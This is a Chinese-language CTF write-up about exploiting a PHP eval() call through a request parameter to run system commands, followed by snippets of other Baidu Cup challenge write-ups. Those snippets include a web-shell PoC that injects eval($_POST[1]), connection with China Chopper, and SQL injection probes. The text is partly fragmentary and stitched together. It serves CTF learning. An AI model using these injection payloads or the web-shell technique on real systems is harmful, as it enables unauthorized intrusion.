進入環境還是進行**審計:
<?php
include
"flag.php";$a
= @$_request
['hello'];
eval
("var_dump($a
);")
;show_source
(__file__
);
eval會將裡面的字串當作php**執行,第一反應就是利用$a在裡面執行**,不過一開始我沒有成功,我以為這樣不行,後來才知道問題。
我一開始是這樣的:
?hello=);
system
("ls"
);
真的有點粗心,首先就沒有注意到var_dump後面本來就有乙個;,而且我還有)沒有閉合。
這樣寫就可以了:
再用cat命令獲得flag.php,然後f12檢視原始碼就可以得到flag了。
百度杯2017 二月場 爆破二 三
include flag.php a request hello eval var dump a show source file 還是 審計 乙個乙個來看 flag.php hello的value設定為讀取檔案的函式,讓eval執行這段函式。fread 讀取指定檔案 可安全用於二進位制檔案 str...
「百度杯」CTF比賽 九月場 Test
個人收穫 1.連線shell 失敗的時候可以試試多個版本的菜刀,可能是菜刀的問題 2.學會了菜刀資料庫管理的配置 題目介面 有現成的poc search.php?searchtype 5 tid area eval post 1 菜刀鏈結,密碼為1我們用菜刀進行訪問 之前我用另乙個菜刀無法連線,開始...
「百度杯」CTF比賽 十月場 登入
這題的sql注入也確實是讓自己漲姿勢了。自己可以說學了mysql就沒有用過like,一直以為它在sql注入裡沒用,沒想到居然可以這樣。進入環境,是乙個登入頁面。嘗試進行sql注入,發現username為admin or 1 1 的時候顯示密碼錯誤,username為admin or 1 2 的時候顯...